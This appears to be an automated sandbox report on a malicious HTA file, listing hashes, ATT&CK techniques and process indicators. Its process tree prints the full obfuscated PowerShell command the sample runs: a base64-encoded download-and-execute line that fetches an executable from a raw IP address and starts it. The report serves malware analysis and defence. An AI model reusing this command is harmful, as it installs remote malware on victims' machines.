64a9d75dd5248c5dea25ed825506581b99821e0bd26a8f8efa88c5cadab7917d

General

Target

hcl_net.hta
Size

3KB
MD5

9c166b7c49e30a25ba012cee1095f95c
SHA1

27dff755c058dfc8b3a3ee3069d896f3c7a06a91
SHA256

64a9d75dd5248c5dea25ed825506581b99821e0bd26a8f8efa88c5cadab7917d
SHA512

df6cdd20fb26d83ebd600d8d5863a2fb843c729404c8f83152d81b2da0d73ba97c74b3d3246f078db0ae25c20bf10256a3f2e6f0dc17d3f33fe9ccb27d69e37d

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2492	pOweRSHell.EXe
2392	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2492	pOweRSHell.EXe
Token: SeDebugPrivilege	2392	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3068 wrote to memory of 2492	3068	mshta.exe	28
PID 3068 wrote to memory of 2492	3068	mshta.exe	28
PID 3068 wrote to memory of 2492	3068	mshta.exe	28
PID 3068 wrote to memory of 2492	3068	mshta.exe	28
PID 2492 wrote to memory of 2392	2492	pOweRSHell.EXe	30
PID 2492 wrote to memory of 2392	2492	pOweRSHell.EXe	30
PID 2492 wrote to memory of 2392	2492	pOweRSHell.EXe	30
PID 2492 wrote to memory of 2392	2492	pOweRSHell.EXe	30

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\hcl_net.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\SysWOW64\wINdOwspoWershELL\v1.0\pOweRSHell.EXe
  "C:\Windows\sysTEm32\wINdOwspoWershELL\v1.0\pOweRSHell.EXe" "PowErSHell.ExE -eX byPaSS -Nop -W 1 -Ec IAAJAFsATgBFAFQALgBTAGUAUgB2AEkAYwBFAHAAbwBpAG4AVABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAFUAcgBJAHQAeQBQAFIATwBUAE8AQwBPAGwAIAAgACAAIAAgACAACQAJACAACQA9ACAAIAAJACAACQAJAAkAIAAgAAkAIAAgAAkAIABbAE4AZQBUAC4AUwBFAGMAVQByAEkAdABZAHAAUgBvAFQAbwBjAE8AbABUAHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgACAAIAAgACAAOwAgACAAIAAgACAAIAAgACAAIAAgACAACQAJAAkACQAJAHcARwBlAHQAIAAJAAkACQAJAAkAKAAdIGgAdAB0AHAAOgAvAC8AMQA5ADIALgAzAC4AMgA0ADMALgAxADUANwAvADUAMgAwAC8AdwBpAB0gIAAJAAkACQAJACAACQAJAAkACQArACAACQAJAAkACQAdIG4AZAAuAGUAeABlAB0gIAAJAAkACQAJACkAIAAJAAkACQAJAAkACQAtAG8AVQB0AGYAaQBsAGUAIAAJAAkACQAJAAkACQAdICQAZQBuAFYAOgB0AGUAbQBwAFwASABDAEwAXwBDAGUAbgB0AG8ALgBlAHgAZQAdICAACQAgAAkAIAAgADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHMAVABhAHIAdAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAdICQAZQBuAHYAOgB0AEUAbQBQAFwASABDAEwAXwBDAGUAbgB0AG8ALgBlAHgAZQAdIA== "
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2492
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -Nop -W 1 -Ec IAAJAFsATgBFAFQALgBTAGUAUgB2AEkAYwBFAHAAbwBpAG4AVABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAFUAcgBJAHQAeQBQAFIATwBUAE8AQwBPAGwAIAAgACAAIAAgACAACQAJACAACQA9ACAAIAAJACAACQAJAAkAIAAgAAkAIAAgAAkAIABbAE4AZQBUAC4AUwBFAGMAVQByAEkAdABZAHAAUgBvAFQAbwBjAE8AbABUAHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgACAAIAAgACAAOwAgACAAIAAgACAAIAAgACAAIAAgACAACQAJAAkACQAJAHcARwBlAHQAIAAJAAkACQAJAAkAKAAdIGgAdAB0AHAAOgAvAC8AMQA5ADIALgAzAC4AMgA0ADMALgAxADUANwAvADUAMgAwAC8AdwBpAB0gIAAJAAkACQAJACAACQAJAAkACQArACAACQAJAAkACQAdIG4AZAAuAGUAeABlAB0gIAAJAAkACQAJACkAIAAJAAkACQAJAAkACQAtAG8AVQB0AGYAaQBsAGUAIAAJAAkACQAJAAkACQAdICQAZQBuAFYAOgB0AGUAbQBwAFwASABDAEwAXwBDAGUAbgB0AG8ALgBlAHgAZQAdICAACQAgAAkAIAAgADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHMAVABhAHIAdAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAdICQAZQBuAHYAOgB0AEUAbQBQAFwASABDAEwAXwBDAGUAbgB0AG8ALgBlAHgAZQAdIA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2392

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YJ9DGBSGKQP8ORN8SQ6A.temp

Filesize
7KB

MD5
edb10d2992fbff8b63be9d11bb90dab7

SHA1
0b1cafaa4ac86fb5eef61adc779211a36868e1a0

SHA256
b7a8b1ef57e3530ef522250cb2f72c360fc82db9a35193d61844f34318342310

SHA512
e1801eb39233a79e9a5ab6968fdd19b716c5523ed4718d62182c9cbea194133e97721f63256a87df8839ae873b8d67e8b81a9db011227b3930cba5b45133419b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
edb10d2992fbff8b63be9d11bb90dab7

SHA1
0b1cafaa4ac86fb5eef61adc779211a36868e1a0

SHA256
b7a8b1ef57e3530ef522250cb2f72c360fc82db9a35193d61844f34318342310

SHA512
e1801eb39233a79e9a5ab6968fdd19b716c5523ed4718d62182c9cbea194133e97721f63256a87df8839ae873b8d67e8b81a9db011227b3930cba5b45133419b

Download Submit
memory/2392-65-0x0000000073C20000-0x00000000741CB000-memory.dmp

Filesize
5.7MB

Download
memory/2392-67-0x00000000025A0000-0x00000000025E0000-memory.dmp

Filesize
256KB

Download
memory/2392-66-0x00000000025A0000-0x00000000025E0000-memory.dmp

Filesize
256KB

Download
memory/2392-68-0x0000000073C20000-0x00000000741CB000-memory.dmp

Filesize
5.7MB

Download
memory/2392-69-0x0000000073C20000-0x00000000741CB000-memory.dmp

Filesize
5.7MB

Download
memory/2492-56-0x0000000073C20000-0x00000000741CB000-memory.dmp

Filesize
5.7MB

Download
memory/2492-58-0x0000000002720000-0x0000000002760000-memory.dmp

Filesize
256KB

Download
memory/2492-57-0x0000000073C20000-0x00000000741CB000-memory.dmp

Filesize
5.7MB

Download
memory/2492-59-0x0000000002720000-0x0000000002760000-memory.dmp

Filesize
256KB

Download
memory/2492-70-0x0000000073C20000-0x00000000741CB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing